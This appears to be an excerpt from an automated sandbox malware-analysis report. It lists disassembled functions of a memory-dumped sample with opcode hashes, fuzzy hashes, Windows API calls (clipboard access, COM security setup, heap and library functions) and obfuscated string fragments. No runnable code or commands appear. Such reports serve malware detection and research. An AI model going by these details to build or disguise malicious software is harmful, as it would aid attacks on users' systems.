                                                                                                                                                                                                                                              • Instruction ID: 191facca889f69fa70601903ca8693053aaba1cbaba24685dbffd0b384c421fe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7ED0A7FDD20110EBC604AB71FC4A41B3A1AEB4722DB545539EC0343352DA39782E868F
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                                                                                                                                                                              • Instruction ID: a89ac6462aaa6a8a5f29c09ee71e481237a955995f4f3f89a98fbf9f2f2a6ed3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBE0E536904210EBD2002B357C06B177678EF9B715F060436F40152115D739E801C5DE
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              • Opcode ID: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                                                                                                                                                                              • Instruction ID: 1146a04256a80fd680d05c5d227ab35205256b262c73fed29a8c8dc337ffb545
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E00114B5249702CFE310CF64D5D8B4BBBF1AB84304F14892CE8A54B385C7B9A9498FC2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                                                              • Opcode ID: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                                                                                                                                                                              • Instruction ID: cdfd11b330a352dee93e16416f8877f043d61a2de36bf40ddff772d5b84e5129
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C601F9B86097058FE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                              • Opcode ID: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                                                                                                                                                                              • Instruction ID: f1973b7854016afe0481596635c710bb103935c4c1c993b3491e04eff0e8badb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01D0A7345545486BD250A75CDD0BF563A5C9703B29F400239B763D61D1D9506920C669
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                                                              • Opcode ID: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                                                                                                                                                                                              • Instruction ID: 9bb2948b1e33ad1240181575e0f5375bfb099cf60bc3df2fdc322b3d55e14239
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAD0C9343D83007AF5748B48ED53F1432169702F11FB00629F322FE6D4C9E07121861D
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                              • Opcode ID: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                                                                                                                                                                              • Instruction ID: 8d81dc3d2e1c71e2762f942217139477682170591cb2c618f1865e02491f5b7e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D0C935505126EBCA506B28BC15BC73A989F4A671F0708A1B4006A075C765EC919AD8
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,?,00414E57,00000400), ref: 00439B50
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                                                              • Instruction ID: 3d340f236624c1ae318c051adf9ea47d82c8c11c3707c94fc3fa8f772c7fe72e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91C04831145224ABDA10AB15EC09B8A3AA8AF496A1F1A04A6B005660B28760AC929A98
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A21A
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A29B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                              • String ID: I,~M$PQ$cba`$cba`$cba`$wEtG$#v
                                                                                                                                                                                                                                              • API String ID: 764372645-191422457
                                                                                                                                                                                                                                              • Opcode ID: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                                                                                                                                                                              • Instruction ID: ce701afe96e54189f6fff091c8333c98f5ae15aa60c98f01a083bef101dadeb2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C59235746093409FE714CF65D891B6BBBE2EBD5300F28882EE58487391D7799C81CB9B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
                                                                                                                                                                                                                                              • API String ID: 0-3047316687
                                                                                                                                                                                                                                              • Opcode ID: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                                                                                                                                                                              • Instruction ID: 146473404e5499b4986dffa8d26f26e1c07bf5215faae6f3d7194190b628d0b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2D124B9608380DFE324DF15E88176BB7E1FBD5304F94982DE58587261D738D901CB4A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                              • String ID: K
                                                                                                                                                                                                                                              • API String ID: 2832541153-856455061
                                                                                                                                                                                                                                              • Opcode ID: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                                                                                                                                                                              • Instruction ID: 513562b2ac7e6d1d4712994eff6d7c1bc04b9d90a7c3137532ed1f51a9abc6ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34418E6150C7818ED310AF7C988826FBFE09B96224F044A6EE8E5872D2E6389549C797
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: #$0$AGsW$P$k
                                                                                                                                                                                                                                              • API String ID: 0-1629916805
                                                                                                                                                                                                                                              • Opcode ID: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                                                                                                                                                                                              • Instruction ID: 8816b6b3b95a3b8c405e0a0f8c285763547ceed8af8c8b555c70c7a9f783aa76
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC1F4317183918ED328CF39D4513ABBBD2AFD2304F68866ED4D58B2D1D6798449C71B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 1/3T$WL$^Q$neA
                                                                                                                                                                                                                                              • API String ID: 0-3205570823
                                                                                                                                                                                                                                              • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                                                                                                                                                                              • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: TU$c!"
                                                                                                                                                                                                                                              • API String ID: 0-3813282519
                                                                                                                                                                                                                                              • Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                                                                                                                                                                                              • Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: pr$|~
                                                                                                                                                                                                                                              • API String ID: 0-4145297803
                                                                                                                                                                                                                                              • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                                                                                                                                                                              • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: pr$|~
                                                                                                                                                                                                                                              • API String ID: 0-4145297803
                                                                                                                                                                                                                                              • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                                                                                                                                                                              • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: BLJB$X
                                                                                                                                                                                                                                              • API String ID: 0-2222927247
                                                                                                                                                                                                                                              • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                                                                                                                                                                              • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: RuA
                                                                                                                                                                                                                                              • API String ID: 0-3286949753
                                                                                                                                                                                                                                              • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                                                                                                                                                                              • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                                                              • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                              • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: cba`
                                                                                                                                                                                                                                              • API String ID: 2994545307-1926275841
                                                                                                                                                                                                                                              • Opcode ID: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                                                                                                                                                                                              • Instruction ID: beb69707a00ddb1e0f288a180930159145dfafadf277c1aff9f3426dfcb85bde
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47113536A44B204BC324CE289DC163777E1AB95314F95263DDCA9D33A1E278EC009AD9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                                                                                                                                                                                              • Instruction ID: af49202ca076376fa415bca2a3091a328854806cafe53c7e33487b358e5641c5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9722B332A087118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                                                                                                                                                                                              • Instruction ID: a0fb517757f1b8da7777bae7579d9f52a382c29ac2183c4fd28747a7d9f1db1e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F402127AB04216CFC704CF28E8906AAB7F2FB8A311F1A847ED58593351D734AD55CB86
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                                                                                                                                                                                              • Instruction ID: 0188f3e029ce03e8205a7a452b25b6dbd5bcd661a0513372e50984eaaf58ab41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98E12F79B04216CFC704CF68E8906AAB7F2FB8A312F1A847EE585D3351D334A955CB85
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                                                                                                                                                                                              • Instruction ID: 292f23283d7cd07bb6fd19c8603031892cd16be448e450c68c3e166b8ce1a4f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAF1CF356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB5A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                                                                                                                                                                                              • Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
